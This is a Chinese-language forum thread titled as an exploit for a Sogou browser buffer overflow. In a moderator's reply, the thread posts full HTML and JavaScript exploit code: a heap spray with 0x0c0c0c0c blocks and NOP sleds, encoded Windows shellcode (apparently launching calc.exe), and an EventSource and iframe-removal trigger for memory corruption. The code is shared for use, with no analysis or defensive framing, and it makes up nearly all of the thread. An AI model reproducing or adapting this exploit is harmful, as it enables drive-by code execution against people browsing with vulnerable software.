发新帖

搜狗浏览器缓冲区溢出漏洞EXP

[复制链接]
908 2 打印 上一主题 下一主题

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
我回来了。。。。

精彩评论2

沙发
骑驴上高速  版主  发表于 2011-12-8 18:42:43 | 只看该作者
<!--test2.html-->
<html>
&nbsp;&nbsp;<body>
&nbsp; &nbsp; <script>
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;top.source = new EventSource("aaat.htm");
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;top.source.onerror =&nbsp;&nbsp;function(err) {
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; top.finish();
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;};
&nbsp; &nbsp; </script>
&nbsp;&nbsp;</body>
</html>

----------------
<!--test.html-->
<html>
&nbsp;&nbsp;<body>
&nbsp; &nbsp; <iframe id="test"&nbsp;&nbsp;width="1" height="1">&nbsp;&nbsp;</iframe>
&nbsp; &nbsp; <script type="text/javascript" src="shellcode.js"></script>
&nbsp; &nbsp; <script>
&nbsp; &nbsp;&nbsp; &nbsp;var&nbsp;&nbsp;source;
&nbsp; &nbsp;&nbsp; &nbsp;shellcode();
&nbsp; &nbsp;&nbsp; &nbsp;function timer(){&nbsp; &nbsp;
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;over();
&nbsp; &nbsp;&nbsp; &nbsp;}
&nbsp; &nbsp; function runTest(){
&nbsp; &nbsp;&nbsp; &nbsp;document.getElementById("test").src = "test2.html";
&nbsp; &nbsp; }
&nbsp; &nbsp; function finish(){
&nbsp; &nbsp;&nbsp; &nbsp;document.body.removeChild(document.getElementById("test"));
&nbsp; &nbsp;&nbsp; &nbsp;setTimeout(timer,1000);
&nbsp; &nbsp;&nbsp; &nbsp;//gc();
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;&nbsp;runTest();
&nbsp;&nbsp;</script>
<A HREF="test.html"> go </A>
</body>
<html>

----------------
//shellcode.js
function gc() {
&nbsp; &nbsp; if (typeof GCController !== "undefined")
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;GCController.collect();
&nbsp; &nbsp; else {
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;function gcRec(n) {
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;if (n < 1)
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; return {};
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;var temp = {i: "ab" + i + (i / 100000)};
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;temp += "foo";
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;gcRec(n-1);
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;}
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;for (var i = 0; i < 1000; i++)
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;gcRec(10)
&nbsp; &nbsp; }
}

function shellcode() {
&nbsp; &nbsp; &nbsp; &nbsp; var shell = unescape("%u6060%u96e9%u0000%u5600%uc931%u8b64%u3071%u768B%u8b0C%u1c76%u468b%u8b08%u207e%u368b%u3966%u184f%uf275%uc35e%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u37e3%u8b49%u8b34%uee01%uff31%uc031%uacfc%uc084%u0a74%ucfc1%u010d%ue9c7%ufff1%uffff%u7c3b%u2824%ude75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%uadc3%u5250%ua7e8%uffff%u89ff%u8107%u08c4%u0000%u8100%u04c7%u0000%u3900%u75ce%uc3e6%u19e8%u0000%u9800%u8afe%u7e0e%ue2d8%u8173%u00ec%u0000%u8900%ue8e5%uff5d%uffff%uc289%ue2eb%u8d5e%u047d%uf189%uc181%u0008%u0000%ub6e8%uffff%uebff%u5b0e%uc031%u5350%u55ff%u9004%u6161%uc031%ue8c3%uffed%uffff%u6163%u636c%u652e%u6578%u0000");
&nbsp; &nbsp; &nbsp; &nbsp; var block = unescape("%u0c0c%u0c0c");
&nbsp; &nbsp; &nbsp; &nbsp; var nops = unescape("%u9090%u9090%u9090");
&nbsp; &nbsp; &nbsp; &nbsp; while (block.length <0x4000) block += block;
&nbsp; &nbsp;&nbsp; &nbsp;block=block.substring(0x90);
&nbsp; &nbsp;&nbsp; &nbsp;memory = new Array(1000);
&nbsp; &nbsp;&nbsp;&nbsp;var shellstr=new Array(3);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; shellstr[0]=block;
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;shellstr[1]=nops;
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;shellstr[2]=shell;
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;var i;
&nbsp; &nbsp; &nbsp; &nbsp; for (i=0;i<0x1000;i++) memory[i] =shellstr.join("");
}
function over(){
&nbsp; &nbsp;&nbsp; &nbsp;var str=unescape("%u0c0c%u0c0c");
&nbsp; &nbsp;&nbsp; &nbsp;var str=unescape("%u0c0c%u0c0c");
&nbsp; &nbsp;&nbsp; &nbsp;strb="";
&nbsp; &nbsp; for(i=0;i<0x10000;++i){
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(i<0x40) strb=strb+str;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; var sdiv=document.createElement("div");
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sdiv.innerText=strb;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(source.readyState==0x0c0c0c0c) {&nbsp; &nbsp;&nbsp;&nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //alert("over ok!&nbsp;&nbsp;run calc.exe!");
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; url=source.URL;
&nbsp; &nbsp;&nbsp; &nbsp; }
&nbsp; &nbsp; }
}
3
murus  乞丐  发表于 2013-10-2 21:38:14 | 只看该作者
沙发!沙发!
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表